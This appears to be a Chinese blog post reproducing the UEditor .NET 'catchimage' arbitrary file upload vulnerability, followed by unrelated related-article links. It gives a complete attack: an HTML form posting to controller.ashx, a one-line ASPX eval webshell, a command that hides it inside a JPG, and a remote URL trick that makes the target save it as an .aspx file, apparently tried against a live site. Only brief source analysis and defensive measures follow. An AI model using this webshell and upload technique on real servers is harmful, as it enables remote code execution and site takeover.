目录

  漏洞背景
  漏洞影响
  漏洞利用
  漏洞分析
  防御措施

漏洞背景

UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器

漏洞影响

该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响。

漏洞利用

首先准备一个html文件用来做post提交

<form action="http://www.xxx.com/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit"/>
</form>

action处填写网站controller.ashx的路径
另外:enctype="application/x-www-form-urlencoded"什么意思?

打开html后如下

这个时候我们需要一台服务器用来放图片木马,服务器可以去阿里云、华为云等申请免费的

我们准备一张2.jpg的图片跟一个小马3.aspx,小马代码如下

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

cmd命令合成图片木马

copy 2.jpg/b + 3.aspx/a 1.jpg

我们把此木马上传到我们的服务器,记住服务器图片路径

在之前的shell addr里填写如下参数

http://x.x.x.x/1.jpg?.aspx

http://x.x.x.x/1.jpg是我们服务器的地址后面跟.aspx以生成aspx文件,提交后页面如下


按理来说我们上传的文件路径应该如下

http://www.xxx.com/ueditor/net/upload/2206/2206-63790xxxxxxx0006134716.aspx

但链接了下不行,后来知道是服务器源码被改了

这里路径是碰巧猜到的,正常应该是带前缀的

这里给去了,所以木马路径应该是

http://www.xxx.com/upload/2206/2206-63790xxxxxxx0006134716.aspx

我发现服务器已经被人入侵了,且留下了后门,我猜测是之前入侵的人改的源码

漏洞分析
UEditor在抓取远程数据源的时,会进入"catchimage"分支

漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传。

java不会啊,没法分析源码,等我学习完后再补充吧

防御措施

1.修改工程目录下net/App_Code/CrawlerHandler.cs文件,添加对文件类型检查的代码。 2.使用各类WAF软件,防止攻击者上传恶意文件。 3.检查文件上传路径下是否有近期上传的畸形图片;检查是否存在asp,aspx等类型危险文件。如果发现异常文件,请判断后及时删除。

UEditor .Net版本任意文件上传漏洞复现相关推荐

  1. UEditor .Net版本任意文件上传漏洞复现总结

    UEditor .Net版本任意文件上传漏洞复现总结 - 知乎 (zhihu.com) 这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近 ...

  2. 畅捷通T+ v17任意文件上传漏洞复现

    1.前言 8月29晚上就开始收到通知,让我们来排查一下是否有使用畅捷通的系统,说是疑似0day导致很多用户被植入勒索病毒,一时间风头十足.第二天很多平台都更新的防护策略,本次漏洞是任意文件上传漏洞,如 ...

  3. 用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用

    1.漏洞概述 用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件.用友 GRP-U8 U8AppProx ...

  4. 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)

    0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...

  5. 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)

    文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...

  6. CVE-2022-29464 WSO2 任意文件上传漏洞复现

    目录 0x01 声明: 0x02 简介: 0x03 漏洞概述: 0x04 影响版本: 0x05 环境搭建: vulfocus搭建: 0x06 漏洞复现: 1.EXP利用: 2.Burp改包: 0x07 ...

  7. 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)

    前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...

  8. php上传漏洞绕过gd库,jQuery File Upload任意文件上传漏洞

    事件背景 jQuery是一个快速.简洁的JavaScript框架,是继Prototype之后又一个JavaScript代码库(或JavaScript框架).jQuery File Upload一个jQ ...

  9. 任意文件上传mysql_BigDump 跨站脚本、SQL注入、任意文件上传漏洞

    发布日期:2012-11-28 更新日期:2012-12-04 受影响系统: ozerov BigDump 0.29b 描述: ------------------------------------ ...

最新文章

  1. 当上 CTO 才发现:程序员时常犯的 4 个错误有多可怕!
  2. uniapp商城_【程序源代码】商城小程序
  3. css 控制溢出文本显示省略号效果
  4. 有没有词匹配算法_Google Ads 再次扩展了关键字变量匹配
  5. 在sql中将表建在别的构件中用什么语句_SQL实战
  6. 【JAVA】 02-Java对象细节
  7. 美丽联合与腾讯云签署战略协议 全面借助腾讯云打造智慧时尚电商平台
  8. 账号密码数据库加密说明
  9. Windows Print Spooler 被曝未修复 0day,可导致恶意软件以管理员权限运行
  10. el-menu实现路由跳转及当前页的导航
  11. ObjectiveC开发教程--如何判断字符串是否为空的方法
  12. 7个详细步骤教程学会大学生静态网页设计与制作
  13. JAVA操作FTP(FTP工具类)
  14. 快速傅里叶变换(FFT)学习
  15. GD32f103ret6 使用HID,设备管理里,提示未知设备
  16. ArcGis 加载tif,tpk,shp格式文件
  17. arduino八段数码管使用
  18. 在线作图丨差异分析——ANOSIM相似性分析
  19. win7安装vmware+ubuntu16.04
  20. U盘重装系统-非常简单制作方法

热门文章

  1. RuntimeError: Couldn‘t resolve requests
  2. 数据库实验六---存储过程
  3. 今日头条-级联组件开发过程
  4. 华为又招了一名天才少年!
  5. 有个网站能开通手机QQ
  6. 组合恒等式1 五个基本的组合恒等式 基础与简单例子
  7. IPV6邻居发现协议(NDP)
  8. 手写实现一个HashMap
  9. openwrt + dnsmasq + anti-AD 两步搞定广告屏蔽
  10. [JAVA]前后端分离智慧校园电子班牌系统源码微信带小程序